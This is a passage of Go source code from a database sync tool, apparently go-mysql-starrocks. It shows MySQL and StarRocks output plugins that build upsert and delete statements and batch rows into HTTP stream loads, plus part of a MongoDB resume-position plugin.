&rule.MysqlRule{Deleted: false} 198 | if err := mapstructure.Decode(config, mr); err != nil { 199 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 200 | } 201 | // if exists, return 202 | ruleKey := rule.RuleKeyFormat(mr.SourceSchema, mr.SourceTable) 203 | for _, ruleObj := range m.rulesMap { 204 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 205 | if ruleKey == tmpRuleKey { 206 | if ruleObj.Deleted { 207 | // if deleted is true, break, waiting to cover. 
208 | break 209 | } 210 | return errors.New("output table rule already exists.") 211 | } 212 | } 213 | m.rulesMap[rule.RuleKeyFormat(mr.SourceSchema, mr.SourceTable)] = mr 214 | return nil 215 | } 216 | 217 | func (m *Mysql) DeleteRule(config map[string]interface{}) error { 218 | m.ruleLock.Lock() 219 | defer m.ruleLock.Unlock() 220 | dsr := &rule.DorisRule{} 221 | if err := mapstructure.Decode(config, dsr); err != nil { 222 | return errors.Trace(errors.New(fmt.Sprintf("delete rule config parsing failed. err: %v", err.Error()))) 223 | } 224 | // if exists delete 225 | ruleKey := rule.RuleKeyFormat(dsr.SourceSchema, dsr.SourceTable) 226 | for _, ruleObj := range m.rulesMap { 227 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 228 | if ruleKey == tmpRuleKey { 229 | // delete(m.rulesMap, ruleKey) 230 | // only mark deleted 231 | m.rulesMap[ruleKey].Deleted = true 232 | return nil 233 | } 234 | } 235 | return errors.New("output table rule not exists.") 236 | } 237 | 238 | func (m *Mysql) GetRules() interface{} { 239 | return m.rulesMap 240 | } 241 | 242 | func (m *Mysql) GetTable(db string, table string) (*schema.Table, error) { 243 | key := fmt.Sprintf("%s.%s", db, table) 244 | m.tableLock.RLock() 245 | t, ok := m.tables[key] 246 | m.tableLock.RUnlock() 247 | if ok { 248 | return t, nil 249 | } 250 | 251 | r, err := m.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 252 | if err != nil { 253 | return nil, err 254 | } 255 | ta := &schema.Table{ 256 | Schema: db, 257 | Name: table, 258 | Columns: make([]schema.TableColumn, 0, 16), 259 | } 260 | for i := 0; i < r.RowNumber(); i++ { 261 | name, _ := r.GetString(i, 0) 262 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 263 | } 264 | m.tableLock.Lock() 265 | m.tables[key] = ta 266 | m.tableLock.Unlock() 267 | return ta, nil 268 | } 269 | 270 | func (m *Mysql) generateSQL(event *msg.Msg, table *schema.Table) (string, []interface{}, error) { 271 | // 
datetime 0000-00-00 00:00:00 write err handle 272 | err := m.datetimeHandle(event, table) 273 | if err != nil { 274 | log.Fatalf("datetime type handle failed: %v", err.Error()) 275 | } 276 | schemaTable := rule.RuleKeyFormat(event.Database, event.Table) 277 | ruleMap, _ := m.rulesMap[schemaTable] 278 | 279 | if len(ruleMap.PrimaryKeys) <= 0 { 280 | return "", nil, errors.Errorf("only support data has primary key") 281 | } 282 | pks := make(map[string]interface{}, len(ruleMap.PrimaryKeys)) 283 | for _, pk := range ruleMap.PrimaryKeys { 284 | pks[pk] = event.DmlMsg.Data[pk] 285 | } 286 | 287 | switch event.DmlMsg.Action { 288 | case msg.InsertAction, msg.UpdateAction: 289 | // TODO insert on duplicate key 290 | updateColumnsIdx := 0 291 | columnNamesAssignWithoutPks := make([]string, len(ruleMap.TargetColumns)-len(ruleMap.PrimaryKeys)) 292 | argsWithoutPks := make([]interface{}, len(ruleMap.TargetColumns)-len(ruleMap.PrimaryKeys)) 293 | allColumnNamesInSQL := make([]string, 0, len(ruleMap.TargetColumns)) 294 | allColumnPlaceHolder := make([]string, len(ruleMap.TargetColumns)) 295 | args := make([]interface{}, 0, len(ruleMap.TargetColumns)) 296 | for i, column := range ruleMap.TargetColumns { 297 | columnNameInSQL := fmt.Sprintf("`%s`", column) 298 | allColumnNamesInSQL = append(allColumnNamesInSQL, columnNameInSQL) 299 | allColumnPlaceHolder[i] = "?" 
300 | columnData := event.DmlMsg.Data[ruleMap.SourceColumns[i]] 301 | args = append(args, columnData) 302 | _, ok := pks[ruleMap.SourceColumns[i]] 303 | if !ok { 304 | columnNamesAssignWithoutPks[updateColumnsIdx] = fmt.Sprintf("%s = ?", columnNameInSQL) 305 | // columnData := event.DmlMsg.Data[ruleMap.SourceColumns[i]] 306 | argsWithoutPks[updateColumnsIdx] = columnData 307 | updateColumnsIdx++ 308 | } 309 | } 310 | sqlInsert := fmt.Sprintf("INSERT INTO `%s`.`%s` (%s) VALUES (%s)", 311 | ruleMap.TargetSchema, 312 | ruleMap.TargetTable, 313 | strings.Join(allColumnNamesInSQL, ","), 314 | strings.Join(allColumnPlaceHolder, ",")) 315 | sqlUpdate := fmt.Sprintf("ON DUPLICATE KEY UPDATE %s", strings.Join(columnNamesAssignWithoutPks, ",")) 316 | return fmt.Sprintf("%s %s", sqlInsert, sqlUpdate), append(args, argsWithoutPks...), nil 317 | case msg.DeleteAction: 318 | // TODO delete 319 | var whereSql []string 320 | var args []interface{} 321 | for i, column := range ruleMap.TargetColumns { 322 | pkData, ok := pks[ruleMap.SourceColumns[i]] 323 | if !ok { 324 | continue 325 | } 326 | whereSql = append(whereSql, fmt.Sprintf("`%s` = ?", column)) 327 | args = append(args, pkData) 328 | } 329 | if len(whereSql) == 0 { 330 | return "", nil, errors.Errorf("where sql is empty, probably missing pk") 331 | } 332 | 333 | stmt := fmt.Sprintf("DELETE FROM `%s`.`%s` WHERE %s", ruleMap.TargetSchema, ruleMap.TargetTable, strings.Join(whereSql, " AND ")) 334 | return stmt, args, nil 335 | default: 336 | log.Fatalf("unhandled message type: %v", event) 337 | } 338 | return "", nil, errors.Errorf("err handle data: %v", event) 339 | } 340 | 341 | func (m *Mysql) StartMetrics() { 342 | m.promTimingMetrics() 343 | } 344 | 345 | func (m *Mysql) promTimingMetrics() { 346 | m.wg.Add(1) 347 | go func() { 348 | defer m.wg.Done() 349 | ticker := time.NewTicker(time.Second * 3) 350 | defer ticker.Stop() 351 | var newDelaySeconds uint32 352 | for { 353 | select { 354 | case <-ticker.C: 355 | // prom 
write delay set 356 | now := time.Now() 357 | if m.syncTimestamp.IsZero() || m.ackTimestamp.IsZero() || m.syncTimestamp == m.ackTimestamp { 358 | newDelaySeconds = 0 359 | } else { 360 | newDelaySeconds = uint32(now.Sub(m.ackTimestamp).Seconds()) 361 | } 362 | // log.Debugf("write delay %vs", newDelay) 363 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 364 | case <-m.ctx.Done(): 365 | return 366 | } 367 | } 368 | }() 369 | } 370 | 371 | func (m *Mysql) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 372 | m.connLock.Lock() 373 | defer m.connLock.Unlock() 374 | argF := make([]func(*client.Conn), 0) 375 | retryNum := 3 376 | for i := 0; i < retryNum; i++ { 377 | if m.conn == nil { 378 | m.conn, err = client.Connect(fmt.Sprintf("%s:%d", m.Host, m.Port), m.UserName, m.Password, "", argF...) 379 | if err != nil { 380 | return nil, errors.Trace(err) 381 | } 382 | } 383 | 384 | rr, err = m.conn.Execute(cmd, args...) 385 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 386 | return 387 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 388 | err := m.conn.Close() 389 | if err != nil { 390 | return nil, err 391 | } 392 | m.conn = nil 393 | continue 394 | } else { 395 | return 396 | } 397 | } 398 | return 399 | } 400 | 401 | func (m *Mysql) datetimeHandle(ev *msg.Msg, table *schema.Table) error { 402 | for _, column := range table.Columns { 403 | if column.Type == schema.TypeDatetime { 404 | if ev.DmlMsg.Data[column.Name] == "0000-00-00 00:00:00" { 405 | ev.DmlMsg.Data[column.Name] = "0000-01-01 00:00:00" 406 | } 407 | } 408 | } 409 | return nil 410 | } 411 | 412 | func (m *Mysql) Pause() error { 413 | m.pauseC <- true 414 | return nil 415 | } 416 | 417 | func (m *Mysql) Resume() error { 418 | m.resumeC <- true 419 | return nil 420 | } 421 | 422 | func (m *Mysql) IsPaused() bool { 423 | return m.paused 424 | } 425 | -------------------------------------------------------------------------------- /pkg/output/op_starrocks.go: 
-------------------------------------------------------------------------------- 1 | package output 2 | 3 | import ( 4 | "context" 5 | "encoding/base64" 6 | "encoding/json" 7 | "fmt" 8 | "github.com/go-mysql-org/go-mysql/client" 9 | "github.com/go-mysql-org/go-mysql/mysql" 10 | "github.com/juju/errors" 11 | "github.com/fatalclarine/go-mysql-starrocks/pkg/channel" 12 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 13 | "github.com/fatalclarine/go-mysql-starrocks/pkg/core" 14 | "github.com/fatalclarine/go-mysql-starrocks/pkg/metrics" 15 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 16 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 17 | "github.com/fatalclarine/go-mysql-starrocks/pkg/rule" 18 | "github.com/fatalclarine/go-mysql-starrocks/pkg/schema" 19 | "github.com/mitchellh/mapstructure" 20 | "github.com/siddontang/go-log/log" 21 | "io" 22 | "net/http" 23 | "strings" 24 | "sync" 25 | "time" 26 | ) 27 | 28 | type Starrocks struct { 29 | *config.StarrocksConfig 30 | tableLock sync.RWMutex 31 | tables map[string]*schema.Table 32 | ruleLock sync.RWMutex 33 | rulesMap map[string]*rule.StarrocksRule 34 | lastCtlMsg *msg.Msg 35 | syncTimestamp time.Time // sync chan中last event timestamp 36 | ackTimestamp time.Time // sync data ack的 event timestamp 37 | close bool 38 | connLock sync.Mutex 39 | conn *client.Conn 40 | inSchema core.Schema 41 | wg sync.WaitGroup 42 | ctx context.Context 43 | cancel context.CancelFunc 44 | pauseC chan bool 45 | resumeC chan bool 46 | paused bool 47 | tr *http.Transport 48 | cli *http.Client 49 | } 50 | 51 | const StarrocksName = "starrocks" 52 | 53 | func init() { 54 | registry.RegisterPlugin(registry.OutputPlugin, StarrocksName, &Starrocks{}) 55 | } 56 | 57 | func (sr *Starrocks) Configure(pipelineName string, configOutput map[string]interface{}) error { 58 | sr.StarrocksConfig = &config.StarrocksConfig{} 59 | var target = configOutput["target"] 60 | err := mapstructure.Decode(target, sr.StarrocksConfig) 61 | if 
err != nil { 62 | log.Fatal("output.target config parsing failed. err: %v", err.Error()) 63 | } 64 | return nil 65 | } 66 | 67 | func (sr *Starrocks) NewOutput(outputConfig interface{}, rulesMap map[string]interface{}, inSchema core.Schema) { 68 | // init map obj 69 | sr.tables = make(map[string]*schema.Table) 70 | sr.rulesMap = make(map[string]*rule.StarrocksRule) 71 | 72 | sr.ctx, sr.cancel = context.WithCancel(context.Background()) 73 | 74 | sr.close = false 75 | sr.StartMetrics() 76 | var err error 77 | // init conn 78 | sr.conn, err = client.Connect(fmt.Sprintf("%s:%d", sr.Host, sr.Port), sr.UserName, sr.Password, "") 79 | if err != nil { 80 | log.Fatal("output config conn failed. err: ", err.Error()) 81 | } 82 | // init rulesMap 83 | if err = mapstructure.Decode(rulesMap, &sr.rulesMap); err != nil { 84 | log.Fatal(err) 85 | } 86 | sr.inSchema = inSchema 87 | sr.pauseC = make(chan bool, 1) 88 | sr.resumeC = make(chan bool, 1) 89 | sr.paused = false 90 | sr.tr = &http.Transport{} 91 | sr.cli = &http.Client{ 92 | Transport: sr.tr, 93 | CheckRedirect: func(req *http.Request, via []*http.Request) error { 94 | req.Header.Add("Authorization", "Basic "+sr.auth()) 95 | // log.Debugf("重定向请求到be: %v", req.URL) 96 | return nil // return nil nil回重定向。 97 | }, 98 | } 99 | } 100 | 101 | func (sr *Starrocks) StartOutput(outputChan *channel.OutputChannel) { 102 | sr.wg.Add(1) 103 | 104 | ticker := time.NewTicker(time.Second * time.Duration(outputChan.FLushCHanMaxWaitSecond)) 105 | defer ticker.Stop() 106 | defer sr.wg.Done() 107 | 108 | eventsLen := 0 109 | schemaTableEvents := make(map[string][]*msg.Msg) 110 | for { 111 | needFlush := false 112 | select { 113 | case v := <-outputChan.SyncChan: 114 | switch data := v.(type) { 115 | case *msg.Msg: 116 | if data.Type == msg.MsgCtl { 117 | sr.lastCtlMsg = data 118 | continue 119 | } 120 | 121 | sr.syncTimestamp = data.Timestamp 122 | 123 | schemaTable := rule.RuleKeyFormat(data.Database, data.Table) 124 | rowsData, ok := 
schemaTableEvents[schemaTable] 125 | if !ok { 126 | schemaTableEvents[schemaTable] = make([]*msg.Msg, 0, outputChan.ChannelSize) 127 | } 128 | schemaTableEvents[schemaTable] = append(rowsData, data) 129 | eventsLen += 1 130 | 131 | if eventsLen >= outputChan.ChannelSize { 132 | needFlush = true 133 | } 134 | } 135 | case <-sr.ctx.Done(): 136 | needFlush = true 137 | log.Infof("wait last one flush output data...") 138 | sr.close = true 139 | case <-ticker.C: 140 | needFlush = true 141 | case <-sr.pauseC: 142 | sr.paused = true 143 | <-sr.resumeC 144 | select { 145 | default: 146 | sr.paused = false 147 | continue 148 | } 149 | } 150 | 151 | if needFlush { 152 | for schemaTable := range schemaTableEvents { 153 | ruleMap, ok := sr.rulesMap[schemaTable] 154 | if !ok { 155 | log.Fatalf("get ruleMap failed: %v", schemaTable) 156 | } 157 | tableObj, err := sr.inSchema.GetTable(ruleMap.SourceSchema, ruleMap.SourceTable) 158 | // tableObj, err := sr.GetTable(ruleMap.TargetSchema, ruleMap.TargetTable) 159 | if err != nil { 160 | // get rule Deleted, if true continue (api delete sync table) bug fix #21 161 | if ruleMap.Deleted { 162 | delete(schemaTableEvents, schemaTable) 163 | continue 164 | } 165 | log.Fatal(err) 166 | } 167 | 168 | err = sr.Execute(schemaTableEvents[schemaTable], tableObj, ruleMap.TargetSchema, ruleMap.TargetTable) 169 | if err != nil { 170 | log.Fatalf("do starrocks bulk err %v, close sync", err) 171 | sr.cancel() 172 | return 173 | } 174 | delete(schemaTableEvents, schemaTable) 175 | } 176 | 177 | if sr.lastCtlMsg.AfterCommitCallback != nil { 178 | err := sr.lastCtlMsg.AfterCommitCallback(sr.lastCtlMsg) 179 | if err != nil { 180 | log.Fatalf("ack msg failed: %v", errors.ErrorStack(err)) 181 | } 182 | // log.Debugf("after commit callback lastCtl: %v", sr.lastCtlMsg.InputContext) 183 | } else { 184 | log.Fatalf("not found AfterCommitCallback func") 185 | } 186 | 187 | sr.ackTimestamp = sr.syncTimestamp 188 | eventsLen = 0 189 | // ticker.Reset(time.Second 
* time.Duration(outputChan.FLushCHanMaxWaitSecond)) 190 | if sr.close { 191 | log.Infof("last one flush output data done.") 192 | return 193 | } 194 | } 195 | } 196 | } 197 | 198 | func (sr *Starrocks) Execute(msgs []*msg.Msg, table *schema.Table, targetSchema string, targetTable string) error { 199 | if len(msgs) == 0 { 200 | return nil 201 | } 202 | var jsonList []string 203 | 204 | jsonList = sr.generateJSON(msgs) 205 | log.Debugf("starrocks bulk custom %s.%s row data num: %d", targetSchema, targetTable, len(jsonList)) 206 | for _, s := range jsonList { 207 | log.Debugf("starrocks custom %s.%s row data: %v", targetSchema, targetTable, s) 208 | } 209 | var err error 210 | for i := 0; i < RetryCount; i++ { 211 | err = sr.SendData(jsonList, table, targetSchema, targetTable, nil) 212 | if err != nil { 213 | log.Warnf("send data failed, err: %v, execute retry...", err.Error()) 214 | if i+1 == RetryCount { 215 | break 216 | } 217 | time.Sleep(time.Duration(RetryInterval*(i+1)) * time.Second) 218 | continue 219 | } 220 | break 221 | } 222 | return err 223 | } 224 | 225 | func (sr *Starrocks) Close() { 226 | sr.cancel() 227 | sr.connLock.Lock() 228 | err := sr.conn.Close() 229 | if err != nil { 230 | log.Fatalf("close starrocks output err: %v", err.Error()) 231 | } 232 | sr.conn = nil 233 | sr.connLock.Unlock() 234 | sr.wg.Wait() 235 | log.Infof("close starrocks output goroutine.") 236 | log.Infof("close starrocks output metrics goroutine.") 237 | } 238 | 239 | func (sr *Starrocks) AddRule(config map[string]interface{}) error { 240 | sr.ruleLock.Lock() 241 | defer sr.ruleLock.Unlock() 242 | srr := &rule.StarrocksRule{Deleted: false} 243 | if err := mapstructure.Decode(config, srr); err != nil { 244 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. 
err: %v", err.Error()))) 245 | } 246 | // if exists, return 247 | ruleKey := rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable) 248 | for _, ruleObj := range sr.rulesMap { 249 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 250 | if ruleKey == tmpRuleKey { 251 | if ruleObj.Deleted { 252 | // if deleted is true, break, waiting to cover. 253 | break 254 | } 255 | return errors.New("output table rule already exists.") 256 | } 257 | } 258 | sr.rulesMap[rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable)] = srr 259 | return nil 260 | } 261 | 262 | func (sr *Starrocks) DeleteRule(config map[string]interface{}) error { 263 | sr.ruleLock.Lock() 264 | defer sr.ruleLock.Unlock() 265 | srr := &rule.StarrocksRule{} 266 | if err := mapstructure.Decode(config, srr); err != nil { 267 | return errors.Trace(errors.New(fmt.Sprintf("add rule config parsing failed. err: %v", err.Error()))) 268 | } 269 | // if exists, return 270 | ruleKey := rule.RuleKeyFormat(srr.SourceSchema, srr.SourceTable) 271 | for _, ruleObj := range sr.rulesMap { 272 | tmpRuleKey := rule.RuleKeyFormat(ruleObj.SourceSchema, ruleObj.SourceTable) 273 | if ruleKey == tmpRuleKey { 274 | // delete(sr.rulesMap, ruleKey) 275 | // only mark deleted 276 | sr.rulesMap[ruleKey].Deleted = true 277 | return nil 278 | } 279 | } 280 | return errors.New("output table rule not exists.") 281 | } 282 | 283 | func (sr *Starrocks) GetRules() interface{} { 284 | return sr.rulesMap 285 | } 286 | 287 | func (sr *Starrocks) GetTable(db string, table string) (*schema.Table, error) { 288 | key := fmt.Sprintf("%s.%s", db, table) 289 | sr.tableLock.RLock() 290 | t, ok := sr.tables[key] 291 | sr.tableLock.RUnlock() 292 | if ok { 293 | return t, nil 294 | } 295 | r, err := sr.ExecuteSQL(fmt.Sprintf("show full columns from `%s`.`%s`", db, table)) 296 | if err != nil { 297 | return nil, err 298 | } 299 | ta := &schema.Table{ 300 | Schema: db, 301 | Name: table, 302 | Columns: make([]schema.TableColumn, 0, 16), 
303 | } 304 | for i := 0; i < r.RowNumber(); i++ { 305 | name, _ := r.GetString(i, 0) 306 | ta.Columns = append(ta.Columns, schema.TableColumn{Name: name}) 307 | } 308 | sr.tableLock.Lock() 309 | sr.tables[key] = ta 310 | sr.tableLock.Unlock() 311 | return ta, nil 312 | } 313 | 314 | func (sr *Starrocks) generateJSON(msgs []*msg.Msg) []string { 315 | var jsonList []string 316 | 317 | for _, event := range msgs { 318 | switch event.DmlMsg.Action { 319 | case msg.InsertAction: 320 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 321 | event.DmlMsg.Data[DeleteColumn] = 0 322 | b, _ := json.Marshal(event.DmlMsg.Data) 323 | jsonList = append(jsonList, string(b)) 324 | case msg.UpdateAction: 325 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 326 | event.DmlMsg.Data[DeleteColumn] = 0 327 | b, _ := json.Marshal(event.DmlMsg.Data) 328 | jsonList = append(jsonList, string(b)) 329 | case msg.DeleteAction: // starrocks2.4版本只支持primary key模型load delete 330 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 331 | event.DmlMsg.Data[DeleteColumn] = 1 332 | b, _ := json.Marshal(event.DmlMsg.Data) 333 | jsonList = append(jsonList, string(b)) 334 | case msg.ReplaceAction: // for mongo 335 | // 增加虚拟列,标识操作类型 (stream load opType:UPSERT 0,DELETE:1) 336 | event.DmlMsg.Data[DeleteColumn] = 0 337 | b, _ := json.Marshal(event.DmlMsg.Data) 338 | jsonList = append(jsonList, string(b)) 339 | default: 340 | log.Fatalf("unhandled message type: %v", event) 341 | } 342 | } 343 | return jsonList 344 | } 345 | 346 | func (sr *Starrocks) SendData(content []string, table *schema.Table, targetSchema string, targetTable string, ignoreColumns []string) error { 347 | /**cli := &http.Client{ 348 | Timeout: 10 * time.Second, 349 | CheckRedirect: func(req *http.Request, via []*http.Request) error { 350 | req.Header.Add("Authorization", "Basic "+sr.auth()) 351 | req.URL.Host = "127.0.0.1:8040" 352 | log.Infof("重定向请求到be: %v", req.URL) 353 | return nil // return nil nil回重定向。 354 | }, 355 | 
}*/ 356 | loadUrl := fmt.Sprintf("http://%s:%d/api/%s/%s/_stream_load", 357 | sr.Host, sr.LoadPort, targetSchema, targetTable) 358 | newContent := `[` + strings.Join(content, ",") + `]` 359 | req, _ := http.NewRequest("PUT", loadUrl, strings.NewReader(newContent)) 360 | 361 | // req.Header.Add 362 | req.Header.Add("Authorization", "Basic "+sr.auth()) 363 | req.Header.Add("Expect", "100-continue") 364 | req.Header.Add("strict_mode", "true") 365 | // req.Header.Add("label", "39c25a5c-7000-496e-a98e-348a264c81de") 366 | req.Header.Add("format", "json") 367 | req.Header.Add("strip_outer_array", "true") 368 | 369 | var columnArray []string 370 | for _, column := range table.Columns { 371 | if sr.isContain(ignoreColumns, column.Name) { 372 | continue 373 | } 374 | columnArray = append(columnArray, "`"+column.Name+"`") 375 | } 376 | columnArray = append(columnArray, DeleteColumn) 377 | columns := fmt.Sprintf("%s, __op = %s", strings.Join(columnArray, ","), DeleteColumn) 378 | req.Header.Add("columns", columns) 379 | 380 | response, err := sr.cli.Do(req) 381 | if err != nil { 382 | return errors.Trace(err) 383 | } 384 | defer func(Body io.ReadCloser) { 385 | _ = Body.Close() 386 | }(response.Body) 387 | returnMap, err := sr.parseResponse(response) 388 | if err != nil { 389 | return errors.Trace(err) 390 | } 391 | if returnMap["Status"] != "Success" { 392 | message := returnMap["Message"] 393 | errorUrl := returnMap["ErrorURL"] 394 | errorMsg := message.(string) + 395 | fmt.Sprintf(", targetTable: %s.%s", targetSchema, targetTable) + 396 | fmt.Sprintf(", visit ErrorURL to view error details, ErrorURL: %s", errorUrl) 397 | return errors.Trace(errors.New(errorMsg)) 398 | } 399 | // prom write event number counter 400 | numberLoadedRows := returnMap["NumberLoadedRows"] 401 | metrics.OpsWriteProcessed.Add(numberLoadedRows.(float64)) 402 | return nil 403 | } 404 | 405 | func (sr *Starrocks) auth() string { 406 | s := sr.UserName + ":" + sr.Password 407 | b := []byte(s) 408 | 409 
| sEnc := base64.StdEncoding.EncodeToString(b) 410 | return sEnc 411 | } 412 | 413 | func (sr *Starrocks) isContain(items []string, item string) bool { 414 | if len(items) == 0 { 415 | return false 416 | } 417 | for _, eachItem := range items { 418 | if eachItem == item { 419 | return true 420 | } 421 | } 422 | return false 423 | } 424 | 425 | func (sr *Starrocks) parseResponse(response *http.Response) (map[string]interface{}, error) { 426 | var result map[string]interface{} 427 | body, err := io.ReadAll(response.Body) 428 | if err == nil { 429 | err = json.Unmarshal(body, &result) 430 | } 431 | 432 | return result, err 433 | } 434 | 435 | func (sr *Starrocks) StartMetrics() { 436 | sr.promTimingMetrics() 437 | } 438 | 439 | func (sr *Starrocks) promTimingMetrics() { 440 | sr.wg.Add(1) 441 | go func() { 442 | defer sr.wg.Done() 443 | ticker := time.NewTicker(time.Second * 3) 444 | defer ticker.Stop() 445 | var newDelaySeconds uint32 446 | for { 447 | select { 448 | case <-ticker.C: 449 | // prom write delay set 450 | now := time.Now() 451 | if sr.syncTimestamp.IsZero() || sr.ackTimestamp.IsZero() || sr.syncTimestamp == sr.ackTimestamp { 452 | newDelaySeconds = 0 453 | } else { 454 | newDelaySeconds = uint32(now.Sub(sr.ackTimestamp).Seconds()) 455 | } 456 | // log.Debugf("write delay %vs", newDelay) 457 | metrics.DelayWriteTime.Set(float64(newDelaySeconds)) 458 | case <-sr.ctx.Done(): 459 | return 460 | } 461 | } 462 | }() 463 | } 464 | 465 | func (sr *Starrocks) ExecuteSQL(cmd string, args ...interface{}) (rr *mysql.Result, err error) { 466 | sr.connLock.Lock() 467 | defer sr.connLock.Unlock() 468 | argF := make([]func(*client.Conn), 0) 469 | retryNum := 3 470 | for i := 0; i < retryNum; i++ { 471 | if sr.conn == nil { 472 | sr.conn, err = client.Connect(fmt.Sprintf("%s:%d", sr.Host, sr.Port), sr.UserName, sr.Password, "", argF...) 473 | if err != nil { 474 | return nil, errors.Trace(err) 475 | } 476 | } 477 | 478 | rr, err = sr.conn.Execute(cmd, args...) 
479 | if err != nil && !mysql.ErrorEqual(err, mysql.ErrBadConn) { 480 | return 481 | } else if mysql.ErrorEqual(err, mysql.ErrBadConn) { 482 | err := sr.conn.Close() 483 | if err != nil { 484 | return nil, err 485 | } 486 | sr.conn = nil 487 | continue 488 | } else { 489 | return 490 | } 491 | } 492 | return 493 | } 494 | 495 | func (sr *Starrocks) Pause() error { 496 | sr.pauseC <- true 497 | return nil 498 | } 499 | 500 | func (sr *Starrocks) Resume() error { 501 | sr.resumeC <- true 502 | return nil 503 | } 504 | 505 | func (sr *Starrocks) IsPaused() bool { 506 | return sr.paused 507 | } 508 | -------------------------------------------------------------------------------- /pkg/output/utils.go: -------------------------------------------------------------------------------- 1 | package output 2 | 3 | import "fmt" 4 | 5 | var DeleteColumn = "_delete_sign_" 6 | var DeleteCondition = fmt.Sprintf("%s=1", DeleteColumn) 7 | var RetryCount = 3 8 | var RetryInterval = 5 9 | -------------------------------------------------------------------------------- /pkg/position/pos_mongo.go: -------------------------------------------------------------------------------- 1 | package position 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "github.com/BurntSushi/toml" 7 | "github.com/juju/errors" 8 | "github.com/fatalclarine/go-mysql-starrocks/pkg/config" 9 | "github.com/fatalclarine/go-mysql-starrocks/pkg/msg" 10 | "github.com/fatalclarine/go-mysql-starrocks/pkg/registry" 11 | "github.com/siddontang/go-log/log" 12 | "github.com/siddontang/go/ioutil2" 13 | "strconv" 14 | "sync" 15 | "time" 16 | ) 17 | 18 | type mongoBasePosition struct { 19 | ResumeTokens *msg.WatchId `bson:"_id"` 20 | } 21 | type MongoPosition struct { 22 | sync.RWMutex 23 | *mongoBasePosition 24 | FilePath string 25 | lastSaveTime time.Time 26 | InitStartPosition time.Time 27 | wg sync.WaitGroup 28 | ctx context.Context 29 | cancel context.CancelFunc 30 | } 31 | 32 | const MongoPosName = "mongo" 33 | 34 | func 
init() { 35 | registry.RegisterPlugin(registry.InputPositionPlugin, MongoPosName, &MongoPosition{}) 36 | } 37 | 38 | func (pos *MongoPosition) Configure(pipelineName string, configInput map[string]interface{}) error { 39 | return nil 40 | } 41 | 42 | func (pos *MongoPosition) LoadPosition(config *config.BaseConfig) string { 43 | var err error 44 | pos.ctx, pos.cancel = context.WithCancel(context.Background()) 45 | // load pos.info file position 46 | positionFilePath := GetPositionFilePath(config) 47 | initPositionData := "[ResumeTokens]\n Data = \"\"" 48 | FindPositionFileNotCreate(positionFilePath, initPositionData) 49 | basePos := &mongoBasePosition{} 50 | if _, err = toml.DecodeFile(positionFilePath, basePos); err != nil { 51 | log.Fatal(err) 52 | } 53 | pos.mongoBasePosition = basePos 54 | pos.FilePath = positionFilePath 55 | 56 | if pos.ResumeTokens.Data != "" { 57 | tm := time.Unix(int64(pos.resumeTokenTimestamp()), 0) 58 | return tm.Format("2006-01-02 15:04:05") 59 | } 60 | 61 | // if ResumeTokens data is "", load config start-position 62 | if config.InputConfig.StartPosition != "" { 63 | var startPosition time.Time 64 | startPosition, err = time.ParseInLocation("2006-01-02 15:04:05", config.InputConfig.StartPosition, time.Local) 65 | if err != nil { 66 | log.Fatal(err) 67 | } 68 | pos.InitStartPosition = startPosition 69 | } 70 | return pos.InitStartPosition.Format("2006-01-02 15:04:05") 71 | } 72 | 73 | func (pos *MongoPosition) SavePosition() error { 74 | if pos.ResumeTokens == nil { 75 | return nil 76 | } 77 | pos.Lock() 78 | defer pos.Unlock() 79 | 80 | n := time.Now() 81 | if n.Sub(pos.lastSaveTime) < time.Second { 82 | return nil 83 | } 84 | pos.lastSaveTime = n 85 | var buf bytes.Buffer 86 | e := toml.NewEncoder(&buf) 87 | var err error 88 | err = e.Encode(pos.mongoBasePosition) 89 | if err != nil { 90 | log.Errorf("save change stream sync position to file %s err %v", pos.FilePath, err) 91 | } 92 | if err = ioutil2.WriteFileAtomic(pos.FilePath, 
buf.Bytes(), 0644); err != nil { 93 | log.Errorf("save change stream sync position to file %s err %v", pos.FilePath, err) 94 | } 95 | log.Infof("save change stream sync position resumeToken timestamp: %d", pos.resumeTokenTimestamp()) 96 | return errors.Trace(err) 97 | } 98 | 99 | func (pos *MongoPosition) ModifyPosition(v string) error { 100 | pos.Lock() 101 | defer pos.Unlock() 102 | if v == "" { 103 | return errors.Errorf("empty value") 104 | } 105 | pos.ResumeTokens.Data = v 106 | return nil 107 | } 108 | 109 | func (pos *MongoPosition) StartPosition() { 110 | if pos.ResumeTokens.Data == "" { 111 | log.Fatal("start position failed: empty value resumeTokens value") 112 | } 113 | 114 | pos.wg.Add(1) 115 | go func() { 116 | defer pos.wg.Done() 117 | ticker := time.NewTicker(time.Second * 3) 118 | defer ticker.Stop() 119 | 120 | for { 121 | select { 122 | case <-ticker.C: 123 | if err := pos.SavePosition(); err != nil { 124 | log.Fatalf("position save failed: %v", errors.ErrorStack(err)) 125 | } 126 | case <-pos.ctx.Done(): 127 | if err := pos.SavePosition(); err != nil { 128 | log.Fatalf("last position save failed: %v", errors.ErrorStack(err)) 129 | } 130 | log.Infof("last position save successfully. 
